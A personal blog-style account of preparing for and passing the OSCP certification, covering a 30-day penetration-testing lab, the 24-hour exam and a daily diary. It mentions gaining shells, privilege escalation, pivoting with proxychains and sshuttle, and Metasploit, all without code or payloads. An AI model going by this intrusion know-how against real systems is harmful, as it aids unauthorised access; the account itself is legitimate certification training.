A detailed OSCP experience..


Summary

1/ TL;DR

2/ OSCP, why ?

2.1/ Feeling of slowing down..

2.2/ What was my initial level ?

3/ How did I prepare myself ?

3.1/ A long-term task..

3.2/ Have I achieved my goals ?

3.3/ Complex situation

4/ The decision

4.1/ Change of “rules”

5/ The beginning

5.1/ The panic

6/ My new life

6.1/ Examen date

7/ The end of the lab

7.1/ The emptiness

7.2/ Exam preparation

8/ Exam

8.1/ Day 1

8.1.1/ Last preparations

8.1.2/ Sleepless night

8.1.3/ 3.00am, start of hostilities

8.1.4/ 7.00am, user shell - 20 pts

8.1.5/ 8.30am, up against the wall

8.1.6/ 10.00am, root shell - 25 pts (pwn)

8.1.7/ 11.40am, user shell - 25 pts

8.1.8/ 1.25pm, root shell - 25 pts

8.1.9/ 1.57pm, root shell - 20 pts

8.1.10/ Break

8.1.11/ 2.36pm, back to work

8.1.12/ 6.00pm, 32 hours of awakening..

8.1.13/ 6.50pm, user shell - 20 pts

8.1.14/ 9.00pm, CTF break

8.1.15/ 10.00pm, back to work

8.1.16/ 2.30am, 42 hours and a half of awakening, time to sleep

8.2/ Day 2

8.2.1/ 9.15pm, the beginning of suffering

8.2.2/ 11.00pm, a little more effort

8.2.3/ 1.50am, report completed

8.2.4/ 2.05am, submission

9/ OffSec’s answer

9.1/ Looking for new challenges

10/ Thoughts record

10.1/ Day -2

10.2/ Day -1

10.3/ Day 1

10.4/ Day 2

10.5/ Day 3

10.6/ Day 4

10.7/ Day 5

10.8/ Day 6

10.9/ Day 7

10.10/ Day 8

10.11/ Day 9

10.12/ Day 10

10.13/ Day 11

10.14/ Day 12

10.15/ Day 13

10.16/ Day 14

10.17/ Day 15

10.18/ Day 16

10.19/ Day 17

10.20/ Day 18

10.21/ Day 19

10.22/ Day 20

10.23/ Day 21

10.24/ Day 22

10.25/ Day 23

10.26/ Day 27

10.27/ Day 28

10.28/ Day 29

10.29/ Day 30

11/ I salute the courage of the survivors!

TL;DR

At the time of access to the OSCP lab, I have 6 months of experience in Pentest. It has also been 8 months that I train in my free time to achieve my goal (get the OSCP). I took an access to the 30-day lab in August. I have scheduled my exam date for October 6 at 3:00 a.m.

Between the lab and the exam, I continued to train through Bug Bounty and hackthebox.eu. On D-Day, I obtained 70 pts for the exam and was able to submit my report on time. A few days later OffSec tells me that I have obtained the OSCP :)

OSCP, why ?

Offensive Security Certified Professional (OSCP) is the most popular Offensive Security Certification. The latter is distinguished by the technical nature of the exam part. In addition, candidates are immersed in a realistic virtualized environment. Since I started my studies in computer security, I have dreamed of obtaining this certification.

At the end of 2017, I set myself the goal of succeeding in the OSCP by the end of 2018.

Feeling of slowing down..

I had a fairly significant learning curve in 2017 and until early 2018, however I had the feeling that Iwas no longer making as much progress as before. Yes, I was getting better but not as fast. I needed to relaunch the machine, I found in the OSCP the motivation, the inspiration to learn very quickly a lot of things.

What was my initial level ?

When I started the lab, I had 6 months of experience in Pentest. In other words, an obvious lack of experience. Of course, my activities with Apéri’Kube and my personal learning have made me feel pretty confident about this certification. Otherwise.. I probably would have waited before attempting the OSCP.

I had discussed it with my apprentice master (Marc Lebrun <3), passing this certification was clearly ambitious considering the overall experience of pentesters rubbing up against the OSCP.

I also read a lot of feedback (like this one :P) to understand the difficulty to overcome. Some excelled without much experience, others with a lot of experience failed and repeat several times, etc. We can’t talk about opportunities, but maybe stress management, time, fatigue.. Nevertheless, among the “most inexperienced”, I denoted an undeniable element: The organization.

How did I prepare myself ?

It is the beginning of January 2018, I want to pass the OSCP in August by taking 30 days of rest. Say what what ? 30 days ?! :D Yes, I used all my paid vacation (yeah in France we have some paid vacation.. :)) and I gave up on a week of salary.. But at least I could only focus on achieving my main objective. In order to feel ready at the beginning of the training, I prepared an 8-month schedule to train during my free time. These 8 months did not simply consist of root-me.org or hackthebox.eu, but to review things on which I did not feel particularly well, whether in networking, adminsys, etc. I prepared a VM, prepared cheatsheets (via cherrytree) and effectively trained through root-me.org and vulnhub.com. I finally used very little hackthebox.eu, wrongly.

A long-term task..

The advantage of an 8-month planning is the possibility to readjust activities according to delays, the learning curve, etc. The planning is therefore to evolve a lot, it allows to keep a running thread but also to note the achievements.

As with any project, it is essential not to set too big objectives, to break down the objectives to obtain many small tasks. This makes it possible to better monitor the progress of the project but also to maintain morale more easily. It is indeed more satisfying to end up the day by telling myself I reached my goal, rather than running after time in front of objectives too global. My main source of inspiration was this pentester (https://scriptdotsh.com/index.php/2018/04/17/17/31-days-of-oscp-experience/).

Have I achieved my goals ?

Obviously not :D I was constantly reorganizing the schedule to lighten it up against the delay I was taking. Nevertheless, I had achieved a large part of my initial objectives. Nevertheless, I kept wondering if I had the level to hope to succeed.

Complex situation

The OSCP represents a significant financial cost, even with minimal access (30 days). So I found myself facing this dilemma for a long time: “Eat pasta for a few more months and try the OSCP or simply give up on the idea of the OSCP.”

The decision

Well, you understand, I ate pasta.

So I contacted Offensive Security to get the certification. They warned me because of my experience and the difficulty of the training.

Offensive Security will provide you with a VPN configuration, so that you can test the connection to their servers and certify that they are of sufficient quality to carry out the training.

My decision was already made, please bring me the note.

The value of the US dollar varies slightly, so count 700€ for a 30-day access to the lab. As a matter of fact indicative, 60 days ~= 870€ and 90 days ~= 1000€.

Once the payment has been made, you will not be able to go back.

Change of “rules”

Shortly afterwards, Offensive Security announced the implementation of proctoring during the examinations in order to limit cheating attempts. Okay, so we’re talking about 24-hour video surveillance and screensharing via a TeamViewer alike solution. This will mostly like bring you more problems such as:

_ There’s an obvious privacy issue, you don’t see your supervisor but your family and yourself are constantly observed by various people. Let’s say I’m paranoid, but nothing prevents anyone in these circumstances from going beyond their supervisory role..

_ Will my current computer (not necessarily at its best) be able to support during 24h a TeamViewer flow while constantly attacking machines?

_ Will I encounter network problems during my scans?

_ Will I have to buy pants for the occasion?

Luckily, I had made the payment before the change of “rules”, so I avoided proctoring on my first test run. On the other hand, if I failed, I would have to buy a retake ($60) and should therefore accept the new rules..

I asked Offensive Security if I could get a refund under these conditions, because I didn’t want to be proctored. OffSec answered me this:

offsec answers

So I had to succeed on my first attempt if I didn’t want to be monitored.

The beginning

My thoughts record is available at the end of the article, I wanted to keep a record of my feelings day after day to be able to see a change in level, rhythm and also to laugh after the lab :D

It turns out that this “diary” presents this experience much better than I could describe it through these many paragraphs… So I’m giving you the benefit of it, without a filter.

However, I will continue my story in a synthetic way to provide a vision with more perspective.

It is July 29, 2018, my access to the lab is activated. I first decide to download all the content provided, consult it and start active network recognition in the background… To my great surprise, the initial network (let’s call it “public”) is very large, my scans show me about 40 machines! While I was consulting the material provided, I therefore carried out complete scans of the machines present to avoid wasting time.

First observation, the documentation provided is long, precise and full of exercises! To get the famous 5 bonus points you will have to do all the required exercises (about 40) and prepare a write-up for 10 machines with different exploiting methods. If everything is correct, then the 5 bonus points are awarded during the exam.

Clearly, in 30 days, I preferred to focus on the lab rather than on the exercises in the hope of getting 5 bonus points.

I also had to prepare my move to come back to my family (on the other side of the country, 8 hours drive). So I continued to perform scans while I familiarized myself with the documentation provided and adjusted my methodology and tools accordingly.

The next day, once I arrived at my family’s house, I finished the full scan of the public network.

It was a special moment, I am with my family only very few and yet barely arrived, already at work in the lab. I don’t think my family expected this scenario even though I had warned them that I was passing an important certification haha :D

The panic

Very quickly I found myself faced with enormous difficulties in this vast environment, I didn’t know where to give a head, not even if the machines I was attacking were potentially exploitable in their current state or if I had to first enter another machine at the other end of the network to hope to reach my initial target..

I realized that I was not ready for this certification despite all the work I had done before and was starting to get demoralized. I can’t count the number of times I’ve been able to rely on my girlfriend to cheer me up..

My new life

Now I live OffSec, I eat, drink, talk, sleep thinking about this lab and the examination that comes with it.

I have a work rhythm that varies from 12h (small day) to 18h (big day), a honest average of the time spent in the lab would be 15h per day, or 450 hours in the lab in 30 days..

Yet, around me life goes on, I see my family sleeping and getting up. I strip cans every 3 hours.. Super diet, I recommend :D

I learn so much in this lab, I become addicted to it, the (aging) environment is nevertheless realistic, OffSec has done a lot of work on interactions between users to reproduce as much as possible a business scenario. There is so much to analyze, to recover on the machines once they are in operation, that I spent at the beginning 10h on the post-operation phases. Once I had fully integrated the post-exploitation methods, I still spent 3 hours there.

These post-exploitation times may seem frustrating, but are necessary if we don’t want to be like many people who come to the Offensive Security forum to ask for clues about the elements they have missed.. It is important to understand that you will be dealing with about fifty machines spread over 4 networks. When you need special credentials or potential passwords in an Excel file, etc., you can only blame yourself if you have overlooked the post-operation phases.

You will then have only two solutions left:

_ Ask for help on the forum and being trolled.

_ Go back to the previously exploited machines, hoping to find what you missed without knowing if you are looking on the right machine..

So do your post-exploitation seriously.

Examen date

Initially, I wanted to plan my exam date before the end of the 30-day lab (because I didn’t know how long it would take me to get a stable Internet connection in my new flat when I returned). Unfortunately and fortunately for me I could not get such an exam date because the first available place was in 40 days! Yes, check availability very early to set your exam date as many people are taking the exam.

The first slot that suits me (a weekend, Saturday at 3am) is October 6, more than 30 days after the end of the lab..

The end of the lab

So I just spent 30 days at a rate of 15 hours a day doing pentest. I know all the Windows and Linux post-exploitation commands by heart. I apply my methodology like a machine four to five times faster than at the beginning. I can quickly identify the “pitfalls” that are present to waste our time, I identify and implement exploits at high speed.

I learned so much, I could never have imagined getting such a level after only 30 days.. However, I still don’t feel ready, I still have a lot of things to prepare to tackle “calmly” the exam a month later.

The emptiness

The end of the lab means the end of a large part of my life’s activities. I started going in circles, counting the hours, I missed the lab! Nowhere else did I find its equivalent, everything seemed so meaningless.. :D I can’t stand CTFs anymore, which are so unrealistic most of the time. I have come to flee this kind of event.

Exam preparation

So I have one month left to prepare my machine, review my methodology, continue to learn and practice to keep control of my automatisms.

My favorite playground becomes the Bug Bounty and hackthebox.eu which allows me to quickly access environments on which I can train.

I continue to prepare myself in this way until D-Day. It was only the day before, that I had the feeling that I was finally really ready, I didn’t know what to do to prepare myself more for this exam.

Exam

Day 1

Last preparations

I prepare my shells, the scans are ready to be launched on the targets, I only wait for one thing for the OffSec email to get my VPN configuration of exam! I have prepared awakenings on my phone (which I always keep as a memory):

Saturday:

_ 2.03am “OSCP Alarm Clock”

_ 7.45am “1 machine pwn”

_ 00.30pm “2 machines pwn”

_ 5.15pm “3 machines pwn”

_ 10.00pm “4 machines pwn”

Sunday:

_ 2.40am “5 machines pwn”

Monday:

_ 2.30am “Hurry 10min report”

This allowed me to keep the notion of time in a reassuring way, I knew if I was ahead or not without getting tired and distracted.

I also set up OBS to record all my 24-hour exams. I was planning on forgetting one or two screenshots for the report and having the opportunity to come back to the video to pick up the moments I needed!

Sleepless night

This was without counting the unusual excitement the short night before the start of the exam.. I couldn’t sleep, so unfortunately I had a sleepless night.

3.00am, start of hostilities

So I receive my VPN configuration and hasten to attack the machines in order. I perform my complete machine recognition while I attack a particular machine.

I quickly spot the pwn machine at 25 pts and decide to keep it on hand to cheer me up (“given” points if I am clear on the methodology to be used, which was my case).

So I’m reviewing the other 4 machines.

7.00am, user shell - 20 pts

I get a first user shell on a 20 pts machine, I couldn’t get in on the other 3 machines. So I persist on getting the root on this fourth machine almost finished.

8.30am, up against the wall

I can’t find a way to achieve a privilege escalation on this machine and am starting to feel frustrated. 5 hours and a half gone, the first alarm clock has already sounded, so I am late, yet I still don’t have a root.

So I decide to attack the pwn machine at 25 pts to confirm these 25 pts and cheer me up while changing my mind.

10.00am, root shell - 25 pts (pwn)

Even if I take the time to take absolutely all the screenshots I might need during the report, I manage to get a root shell on the pwn machine pretty quickly.

So I am still missing 45 pts (1 machine at 25 pts and 1 machine at 20 pts).

I decide to focus on the last 25 pts machine whose initial entry point I couldn’t absolutely see during my first run.

11.40am, user shell - 25 pts

After about fifteen minutes, I start by discovering my entry ticket for a user shell. However, the exploitation is not trivial and the target machine is seems to be exotic. I manage to get a user shell 1h30 after the initial discovery. The operation was rather complex.

So I’m focusing on the privilege escalation part of this machine.

1.25pm, root shell - 25 pts

I quickly spot something suspicious and dig in that direction. The privilege elevation is a bit of a puzzle, nice, but a bit slow to achieve.. Anyway, I get root access on the machine and the associated 25 pts at 1:25pm!

1.57pm, root shell - 20 pts

I now have 50 pts and a user shell on a 20 pts machine… That would be ideal, wouldn’t it? I’m reattacking the privilege elevation phase on this machine. The fact that I had changed my mind allowed me to look at the machine from a different angle. So I resumed the analysis of the machine elements, and noticed something potentially interesting.. I’m testing and at that very moment I knew it was the jackpot!

So I set up the exploit and that’s it.. I have the 70 coveted points after 10 hours and 57 minutes.

Break

Of course, it’s the excitement! All these months of work have finally paid off! As a kid I warn my girlfriend, my parents, my friends that the count is good and take the opportunity to take a break.

2.36pm, back to work

I had so much adrenaline, I was tired but I couldn’t bring myself to go to sleep despite my 28 hours+ of waking up. I wanted to get the 100 pts!

So I went back to work directly on the last two machines (20 pts and 10 pts).

6.00pm, 32 hours of awakening..

3h30 later, I really start to be in difficulty to think, I fill up again with caffeine and fast sugars and stay on track..

I have an entry point on the machine at 10 pts, but I’m not thinking clearly and can’t take advantage of this vulnerability to get root access on the machine. I suppose rightly, that if the machine is worth 10 pts, it is because there is no privilege escalation to be realized. This does not mean that getting these 10 pts is “simple”.

6.50pm, user shell - 20 pts

By returning a little on the machine at 20 pts, I manage to see an element under my nose from the beginning, but that fatigue prevented me from seeing easily… It was really ridiculous, I had just taken 6 hours to see a crucial element present under my nose from the beginning!

Anyway, I had just got a user shell on the 20 pts machine.

So I persist on this machine. I quickly identify the vulnerability and therefore look at the exploit to be implemented.

I WASN’T READY, I REALLY WASN’T. It was necessary to set up 4 exploits together documented by advisories of 1015 pages. I tried again and again, but it was too much effort for my level of concentration and thinking with so much fatigue.

9.00pm, CTF break

1h later, I decide to take my mind off, yet I wouldn’t have been able to sleep.. And then, it’s a good thing a CTF has just started, so I decide to take a look around.

10.00pm, back to work

After an hour, I get tired of it, take my caffeine doses back and get back to work.

I can’t put the pieces of the puzzle together on the 20 pts machine. As for the 10 pts machine, I adopted a method that I think was the right one. Since there is no privilege elevation, and I’m supposed to get root access.. There are not 15,000 possibilities either, in my recognition, so I identify 2 serious candidates for exploitation leading to root access.

Both services are “exploitable” but I can’t really get benefit from one of them under these conditions, even if I use my MetaSploit shot against this machine.

2.30am, 42 hours and half of awakening, time to sleep

4h30 later, the end is near (2.45am), I give up my weapons. So I will go to bed with the disappointment of not getting my 100 pts, probably because I didn’t force myself to sleep after getting my 70 pts.

So I got 70 pts + a user shell on a 20 pts machine.

I set an alarm clock for 00.30pm.

Day 2

The alarm clock rings, it’s complicated to get up :D So I have to make the report. I take the time to wake up, eat, etc. I had everything but a desire to write this report, it took me a long time to get started. When I decided to look into it it was 4.00pm.

The report is to be submitted before 2.45am, quite confident I tell myself that this will be more than enough.

I therefore calmly review the expectations regarding the reports and start writing the report based on the OffSec template. I preferred to use the template since it has been validated by Offensive Security and meets their expectations, thus reducing the chances of missing it in this way.

But a problem arises quickly, I don’t know if I should write the documentation for the 5 machines (including those I didn’t compromise). The issue here is whether I do not mention them by simulating the fact that I am making a “perfect” intrusion report or whether I present them by indicating in the report that the machines have flaws, but that could not be fully exploited during the audit).

I therefore decide to contact Offensive Security by email and continue the report. OffSec is again very reactive and tells me that I decide what I want to present to them.

My choice is therefore, otherwise I only present the 3 compromised machines and if I really have time to do the documentation on the other 2 machines then I will do it.

So I really start the technical part of the report at around 5.30pm and bend to the OffSec operating mode, i.e. a write-up of several machines within a pentest report. So it’s not a pentest report, but rather a CTF write-up in disguise.

9.15pm, the beginning of suffering

I just detailed a 25 pts machine (not the pwn machine which is the longest to detail). It’s 9.15pm, I’m beginning to understand that it’s going to be complicated to meet the deadlines for the 5 machines. I don’t stop and keep going.

11.00pm, a little more effort

A little less than 2 hours later, I finish the explanations related to the 20 pts machine. I have 3h40 to submit my report and I still have the 25 pts pwn machine (which is the longest) to explain.

1.50am, report completed

As I have become accustomed to the method of writing via the two previous machines, I manage to complete the report at 1.50am. So I reread all the obligations in terms of rendering to make sure I don’t miss so close to the goal.

I prepare the email, send the report to the dedicated platform and retrieve the associated link.

Read the email again and again.

2.05am, submission

At 2.05am, everything seems to be in order, I decide to submit the report and resurface with my loved ones, asleep without news.

OffSec’s answer

2 days later, while I was attending a Threat Intelligence course at school, I received the answer from Offensive Security indicating that I had just succeeded.

glory

I had so much adrenaline, my breath almost out, I had succeeded :D

Looking for new challenges

I have often been asked what I plan to do after this certification. The “obvious” answer is the OSCE (Offensive Security Certified Expert) which focuses on the development of exploits and is considered more difficult than the OSCP.

This is obviously an objective, but not a current one. I have many other personal learning projects to implement before I can tackle this certification :)

Even today (4 months later), I still have trouble realizing that I have obtained the OSCP. A certification that I can only recommend to all pentesters who are wondering about it.

Thoughts record

I mentioned it at the beginning of the article, you will find below my thoughts record 2 days before the OSCP lab until the last day of the lab. I have not deliberately filtered anything to show you that it is not simple (as some articles might suggest once certification is in place). You will also see the evolution of skills according to the rhythm/assurance.

Hoping that this long feedback will have allowed you to learn more about this certification.

NB: The CEH (or other paper certification) is in no way comparable to the OSCP, you have understood this, here you do not tick a MCQ.

Day -2

On July 27, I leave my work behind for a month of “holidays” (try hard the OSCP). In parallel, I have personal problems, I’m starting to lose motivation, and I’m getting a little nervous about the OSCP. Moreover, since I learned that I have to succeed on my first attempt if I want to avoid the new proctored exam! I paid the OSCP around July 15, so I am not concerned about the surveillance for my first attempt, but if I fail and reappear, I will have to comply with the requirements to be put in place for the proctored exam. I have a lot of concerns about this new exam, because I really don’t want to be spied on for 24 hours and I’m afraid I might have connection problems or hardware problems with screensharing + Skype or something else.. My laptop is at the end of its life.

Day -1

On July 28th, I woke up in the same mood, I have to clean my flat and leave it on the morning of July 30th before returning to my family, ~700km away. I am 10 hours from the official start of my OSCP journey. I still have a lot of things to clean in the flat, then I will rewrite my network scan scripts to be effective. I already plan not to do the exercises since there are only 5 points and I will have about 25 days of OSCP training before trying my luck! Yes, I will not take the 30 days before trying the OSCP because I have to leave my family’s home sooner than I can. My next flat is waiting for me 800 km from their home.. And since I don’t want to do the OSCP exam on a connection I’ve never used, etc. I will do my best in 25 days to succeed at the OSCP on my family’s connection! I try to motivate myself as best I can in many ways => sugar, sport, music, the mind must be on my side. I don’t know how many machines there are on the OSCP networks, I think between 50 and 90 based on the many feedback I’ve read.. I want all the root! I have to root between 5025 = 2 machines/day and 9025 = 3.6 machines/day in the worst case.

Day 1

July 29, it’s 2.00am, my OSCP journey begins! Let’s download the course material first! I haven’t finished preparing for the OSCP (scripts are being written and my machine configuration is not finished), I finish by downloading the videos (which takes me about 2h30). The scripts are finished, 80 minutes left to download, I looked at the OSCP forum which seems to contain a lot of clues. ._. I hope I won’t need it! There’s a platform to break LM hashes. It is said that if you can’t break a hash using the pot and wordlists embedded in kali, then this is probably not the right method. I’m going to fall asleep to save this unused time before I start the videos. It’s noon, I start, I go through the videos and I skip the ones I’m sure I already know well. While the videos are playing, I access the lab to perform basic recognition with my network scripts. 8.00pm, I’m done with the videos and most of my organization, I’ve done many network scans, and I’ll continue until I’m done with all the machines on the public network! I don’t want to miss anything. While the network scans are in progress, I’ll try to attack my first target! It’s 1.00am, I worked on 3 machines, I couldn’t access any of them. I’m definitely behind schedule if there are 90 machines, I have to be more efficient. The OSCP is really difficult. I’m not sure I’m getting used to logic yet. I hope that my organizational work will pay off in the next few days. Tomorrow, I’ll be driving all day, so I’m not really sure I’ll be able to root a single machine..

Day 2

On July 30, I’m already exhausted, I have to leave my flat, I drive all day in hot weather. 6.00pm I arrived, 10.00pm OSCP I’m back! I finished with my full network recognition. And by going back to one of the 3 machines I’ve already tried. I have a reverse shell on one of them, limited but still.. My first Shell OSCP! Now I have to do a privilege escalation, but it’s time to sleep!

Day 3

July 31, wake-up at 10.00am, family relaxation until 1.00pm. Then OSCP until 2.00am. I have struggled so much with a Windows machine, I am a little used to Windows, but I had huge difficulties to do the privilege escalation part. I also learned from what I was doing wrong, it took me 8 hours+ to understand where I was wrong. Then I quickly root the machine, the 1st root shell after about 2 days. It was so hard that I thought I couldn’t do it :p I’m so late in achieving my goals.. After getting root access, I got all the information I could, and found some interesting things, I guess I’ll need it later.. I also discovered that the machine I have root was duplicated, so 42 machines out of 44 remaining in the 1st network. It’s time to sleep and do better the next day.

Day 4

August 1st, I have got root on 2 machines, so far my best day, I have already spent 4 days in my lab and I have only got root on 3 machines. On the other hand, I have done a complete recognition, I am also conscientiously doing the post-exploitation to get as much information as possible, I hope I will get root on 3 machines per day from now on.. I have already seen improvements since the beginning of this certification. I’m learning a lot of things.

Day 5

On August 2nd, I had 2 machines, but I was panicked because my VM had a problem and my last snapshot was 3 days ago.. I almost thought I’d have to do my last 4 machines where I’ve got root again.. However, I found a way to repair my kali, edit the grub, put rw instead of ro and put init=/bin/bash.

Then I started in recovery mode, redefined my root password because I couldn’t enter my root password of more than 20 characters in qwerty.. Then as I couldn’t repair my damaged packages (the last apt-get upgrade probably sealed my fate), and as in recovery I couldn’t copy my files into my shared host folder, I transferred the backup files using netcat :D What a jerk, but it ends well ><

Day 6

On August 3rd, I literally spent 12/13h on a Windows machine, I managed to get a shell on it after the first 8 hours, but I couldn’t find a solution for the privilege escalation part, I guess I’m missing the password of the admin of another machine for which I haven’t yet found a way to compromise it. Sad day, no root :(

Day 7

On August 4th, I spent 3 hours trying to get root on yesterday’s machine.. But I didn’t succeed, so I went to another machine, got root in 1h30, then another one, got root in 4h30. 6h later I have got another root :) Pretty cool, I’ve got root on 8 machines in 6 days.

Day 8

August 5, only 1 machine today, but I’m pretty happy, because I saw a lot of people fighting for 1-2 weeks against it! The things I learned from the beginning have helped me a lot to get it quickly :) Then I went to another machine.. I didn’t realize at that moment that I was going to suffer so much.. The first pwn machine I’ve ever seen! I used to think that yeah, the OSCP contains pwn, but it could be a simple buffer overflow.. and yet you can imagine that they will use a service like the ones you can find in the VM Brainpan. This is NOT the case. They lead you to a more common situation. The idea remains the same, it is to modify an exploit to adapt it to your case and it is a little “simple” compared to the pwn challenges you can find in CTFs. However, when you are not comfortable with the pwn, you start to struggle well :‘) I realized the recognition of this machine, I know my target. But I’ll do it after a little rest.

Day 9

August 6, this day is by far the most successful! I tried to understand how I could get root on the pwn machine. After a few hours, I was fed up, also a little tired, I had to change my mind, I went back to a machine I had left some time ago. I succeeded at gaining root access, then I extracted the information. This day was great, I have got root on 3 machines and I took a lot of time to do a good post-exploitation once NT SYSTEM under Windows, I learned a lot of things and I prepared a cheatsheet to do it again but faster next time! Currently, I have got root on 13 machines in 8 days.

Day 10

August 7th, it’s misery, I’ve been struggling all day on a machine, I finally managed to get root at the end of the day, I’m exhausted..

Day 11

On August 8th, I was out of shape, I tried several targets to look for an easy win, but I didn’t find any, so I came back on a machine I had left before and spent the rest of the day there. No root today:(.. Sleeping with the feeling of not being good enough.

Day 12

August 9th, today was one of my craziest days! I first managed to get root on yesterday’s machine and on another one the next hour! Then soon after taking the first target that was in front of me.. I came across the so famous machine.. “Pain”. I was there like wow, am I really ready for that? I’ve heard a lot of stories about it, that it’s one of the hardest machines in the lab! Nevertheless, I tried, enumerated everything I could, I quickly found the entry point, 1h30 after the beginning, I got my reverse shell! \o/ Privilege escalation part was difficult, I spent 10 hours on it! By trying almost everything I could, I won’t spoil your fun when you eventually start OSCP but I must say that it was both painful and extremely satisfying! I felt like one of those SPARTE guys! 8)

this is sparta!

Day 13

August 10, review after 12 days of lab. I have access on another network, I have control of the AD, and I survived “Pain”, I have a total of 16 root access. At the end of the day, I got root on 19 machines :) I calculated that I can almost finish the lab if I get 3 boxes/day by then.. #ChallengeAccepted

Day 14

On August 11th, first day to face my new objective, I got root on a machine in the first hours and then.. I started a new one :‘) When I had the reverse shell on it 2 hours later, I realized it was “Gh0st”! At that time, I knew that it would probably be complicated to get rid of it quickly. 10 hours later I put my root shell on it \o/ I didn’t have time to make a third box today, I failed but it’s kind of a good day with Gh0st down!

Day 15

August 12, it was a very good day, I wanted to recover the missing box of the last day, I have got root on 2 machines in less than 3 hours, but I fight against a particular OS that makes reverse shell stable with a very complex tty.. I’m 15 days from the end, I have 23 root access.

Day 16

On August 13, after a few hours, I finally managed to put an end to this painful machine. I then quickly have got root on 2 boxes, in 6 hours I had 3 more :) The rest of the day? Struggling against a single machine, I’ve been exploring a rabbit hole for so long.

Day 17

On August 14th, it took me 4 more hours to understand and get a root access on yesterday’s machine.. Let’s finally move on to something else. I’m now facing the “Humble” machine, it’s 5.00am, when I discovered what I was supposed to exploit I was like.. wut? Isn’t that a trap? No, I’m on the right track! 9.00am, I went to bed, back at 2.00pm until 5.00am.. I still haven’t been able to get the reverse shell.

Day 18

On August 15th, still struggling with Humble, I tried another machine I had left in my first days, I managed to get root pretty quickly. I also got the root on “fc4”!

Day 19

On August 16, return to Humble and return to the hellish.. Everything suddenly became clear in my mind, it was so obvious, I don’t know why I fought so hard.. After 30 hours I had my reverse shell on Humble, 2 hours later I managed to get root! Wow :) I have pain/gh0st/humble/fc4, now I’m going to tackle the missing “sufference” I left behind! Then I will focus on getting access to the administration network! The rest of the day I was on fire! I’ve got root on 4 machines. 18 days have already passed and I have 34 machines!

Day 20

On August 17, I started my day by trying to get root on sufferance because it is the only one of the big 5 that I miss. But well, it was hell in there, after about 7h, I felt like I was not moving anywhere. So I retired, and moved on.. The public network is starting to take too long, so I decided to enter the Admin network! My first target was the IT network! I spent the rest of the day fighting with new problems.. Network problems! Yeah, once you start going on another network, say hello to proxychains and long scans :) I discovered sshuttles, it was so cool! If you are not familiar with this tool, YOU MUST TEST IT. It is about setting up a VPN tunnel between you and your target using an intermediate machine… It’s a hell of a lot faster! The only requirement is that your intermediate machine needs python 2.3 and to have python in its path or that you are able to specify the path! So it won’t work every time but it’s a good thing:) I got tired of compromising a machine on the IT network, I went to bed without a root today, it was so frustrating, it’s been a while since I was up against the wall. If I have any advice to give you, don’t assume anything, test it, K.I.S.S. Always 34 root access, 10 days left. I deduced this number considering the organization of the forum, it seems that 63 machines are referenced. There may be secret machines, but you have an idea of the number of targets! I’m missing at least 29 in 10 days. 3 per day… Challenge accepted, let’s go!

Day 21

On August 18, while investigating the IT network, I noticed that several machines had an interface on the public network! My first assumption of having 63 machines to compromise is therefore decreasing! But to keep things simple and to avoid recounting the actual number of different machines right now, I will simply increase my number of root machines. As some hidden targets may remain and I’m not sure I’m not mistaken about the counting, so I increase the number of root. 34 machines as root => 37 root. I will then focus on the remaining IT targets! The rest of the day, I struggled with the constraints of the network, I had to think more about how to trigger, transmit, receive my exploits in pivoting.. A particularly horrible machine for pivoting using MSF is “Niky”.. No root today..

Day 22

On August 19, I met an administrative machine.. I have a Webshell on it, it was almost too beautiful, I discovered that I was not able to do more than that in the current state.. So I went to other machines, scanning again and again this new network.. I’ve been here all day. I haven’t had a root access for 2 days, it’s getting frustrating.. I decided to learn how to pwn, to develop exploits (I’m not used to pwn, so yes, it’s not a fun part).. After that I’ve got root on 2 machines, 39 root/8 days from the end.

Day 23

On August 20, I start my last 8 days. I worked all day on Niky, it was crazy to configure all the routing to make it work! Finally, I managed it and I got root on Niky shortly after! 40 root \o/ This is the first machine I met that has a step in the dev network, but I can’t unlock it yet or scan it easily through Niky. By the way, Niky is also part of the dev network and has been counted as +1, so should be considered as another root => 41. 22 machines missing for 7 days.

Day 27

August 24, Ok from August 21 to 24, I totally left this thoughts record.. I wasn’t in a good mood, personal problems.. I didn’t work at all one of those days too. So I don’t know exactly what I’ve done these days, but the main thing is that I’m in the administration network now! I compromised 2 out of 4 administration machines, discovered a hidden one and that’s it. I’m going to count exactly how many machines I have got root access, I mean the real number, not with a dual interface.

Public:

  • 44 machines discovered ;

  • 1 of it isn’t intended to be vulnerable, it’s the firewall which links to the other networks ;

  • 3 are duplicated since they are popular ;

  • As a result => 40 machines, differents, intended to be compromised ;

  • Root 34 out of 40 ;

  • Remains 6 machines (Sufferance included, the last of the big 5 => Humble, Pain, Sufferance, Gh0st, FC4).

IT:

  • 11 machines discovered ;

  • 1 of it isn’t intended to be vulnerable, the firewall again ;

  • 5 machines have an interface linked to the public network, compromised in public ;

  • As a result => 5 machines, differents, intended to be compromised ;

  • Root 2 out of the 5, one of the remaining leads to the admin network (I’ve accessed to, but the machine’s role is really weird and have no starting point to compromise it) ;

  • Remains 3 out of 5.

Dev:

  • Not discovered yet, I can’t state about it.

Admin:

  • 5 machines discovered ;

  • Not sure if any is not intended to be vulnerable, officially there are 4 machines, in fact I found out another one, but since I’m not sure about its role, I’m stating about it ;

  • As a result => 5 machines, differents, intended to be compromised ;

  • Root 2 out of 5, have a simple shell on one of the remaining, still have to do the privilege escalation (hard time) ;

  • Remains 3 out of 5.

Total:

  • 60 machines discovered ;

  • 2 machines aren’t intended to be vulnerable ;

  • 8 are or considered duplicated ;

  • As a result => 50 machines, differents, intended to be compromised in Public/IT/Admin networks ;

  • Root 40 out of 50 ;

  • Remains 10 machines in Public/IT/Admin ;

  • Still have to discover the Dev network in one of those machines ;

  • 4 days remaining, to be exact, 91 hours 20 minutes.

Some thoughts:

Even if there are duplicates or machines that are not intended to be vulnerable, you can always try to do so, I have spent more than 15 hours on machines that I thought were meant to be compromised! Then I read the “rules”, and I understood that I wasn’t supposed to compromise them.. Machines declared as duplicated will consume part of your time, you must first realize that you have already compromised them and that they are duplicated.. So, you will eventually use some network scans, and several approaches before you do it, keep in mind that they are time consuming! You can always try to compromise the machines in a different way, but my advice is to move on to the next ones that you have not yet compromised. You still have a lot to discover!

You also have no idea where you’re going to find the key to another network! I got 5 times an access to the IT network, once to the admin (the only way I think), while I still have no track on the dev!

